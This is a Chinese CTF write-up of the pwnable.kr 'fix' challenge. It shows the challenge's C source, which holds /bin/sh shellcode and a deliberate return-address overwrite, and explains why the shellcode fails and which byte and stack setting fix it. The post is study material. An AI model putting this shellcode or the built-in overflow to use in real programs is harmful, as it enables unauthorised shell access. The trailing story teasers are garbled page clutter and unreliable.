pwnable.kr之fix

#include <stdio.h>

// 23byte shellcode from http://shell-storm.org/shellcode/files/shellcode-827.php
char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
                "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

void shellcode(){
        // a buffer we are about to exploit!
        char buf[20];

        // prepare shellcode on executable stack!
        strcpy(buf, sc);

        // overwrite return address!
        *(int*)(buf+32) = buf;

        printf("get shell\n");
}

int main(){
        printf("What the hell is wrong with my shellcode??????\n");
        printf("I just copied and pasted it from shell-storm.org :(\n");
        printf("Can you fix it for me?\n");

        unsigned int index=0;
        printf("Tell me the byte index to be fixed : ");
        scanf("%d", &index);
        fflush(stdin);

        if(index > 22)  return 0;

        int fix=0;
        printf("Tell me the value to be patched : ");
        scanf("%d", &fix);

        // patching my shellcode
        sc[index] = fix;        

        // this should work..
        shellcode();
        return 0;
}

看代碼, 使用了一段有效的shellcode但是執(zhí)行失敗, gdb跟進(jìn)去發(fā)現(xiàn)是因?yàn)閑sp接近shellcode存放區(qū)域, 調(diào)用push指令破壞了shellcode.

  1. xor %eax,%eax
  2. push %eax
  3. push $0x68732f2f
  4. push $0x6e69622f
  5. mov %esp,%ebx
  6. push %eax
  7. push %ebx
  8. mov %esp,%ecx
  9. mov $0xb,%al
  10. int $0x80

由于只能改一位, 需要修改的是6. push eax(即偏移15), 網(wǎng)上查到說(shuō)leave指令可以, 但是測(cè)試發(fā)現(xiàn)無(wú)效, pop esp顯然有效, 可以極大修改esp的值, 測(cè)試無(wú)效. 最后查writeup發(fā)現(xiàn)需要修改棧的范圍

ulimit -s unlimited

這一點(diǎn)確實(shí)沒(méi)想到, 也使得這種解法在此處有所瑕疵

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子城看,更是在濱河造成了極大的恐慌乐严,老刑警劉巖,帶你破解...
    沈念sama閱讀 218,122評(píng)論 6 505
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件掉缺,死亡現(xiàn)場(chǎng)離奇詭異卜录,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)眶明,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,070評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門(mén)艰毒,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人搜囱,你說(shuō)我怎么就攤上這事丑瞧。” “怎么了犬辰?”我有些...
    開(kāi)封第一講書(shū)人閱讀 164,491評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵嗦篱,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我幌缝,道長(zhǎng)灸促,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,636評(píng)論 1 293
  • 正文 為了忘掉前任涵卵,我火速辦了婚禮浴栽,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘轿偎。我一直安慰自己典鸡,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,676評(píng)論 6 392
  • 文/花漫 我一把揭開(kāi)白布坏晦。 她就那樣靜靜地躺著萝玷,像睡著了一般嫁乘。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上球碉,一...
    開(kāi)封第一講書(shū)人閱讀 51,541評(píng)論 1 305
  • 那天蜓斧,我揣著相機(jī)與錄音,去河邊找鬼睁冬。 笑死挎春,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的豆拨。 我是一名探鬼主播直奋,決...
    沈念sama閱讀 40,292評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼施禾!你這毒婦竟也來(lái)了脚线?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 39,211評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤拾积,失蹤者是張志新(化名)和其女友劉穎殉挽,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體拓巧,經(jīng)...
    沈念sama閱讀 45,655評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡斯碌,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,846評(píng)論 3 336
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了肛度。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片傻唾。...
    茶點(diǎn)故事閱讀 39,965評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖承耿,靈堂內(nèi)的尸體忽然破棺而出冠骄,到底是詐尸還是另有隱情,我是刑警寧澤加袋,帶...
    沈念sama閱讀 35,684評(píng)論 5 347
  • 正文 年R本政府宣布凛辣,位于F島的核電站,受9級(jí)特大地震影響职烧,放射性物質(zhì)發(fā)生泄漏扁誓。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,295評(píng)論 3 329
  • 文/蒙蒙 一蚀之、第九天 我趴在偏房一處隱蔽的房頂上張望蝗敢。 院中可真熱鬧,春花似錦足删、人聲如沸寿谴。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,894評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)讶泰。三九已至咏瑟,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間痪署,已是汗流浹背响蕴。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 33,012評(píng)論 1 269
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留惠桃,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 48,126評(píng)論 3 370
  • 正文 我出身青樓辖试,卻偏偏與公主長(zhǎng)得像辜王,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子罐孝,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,914評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容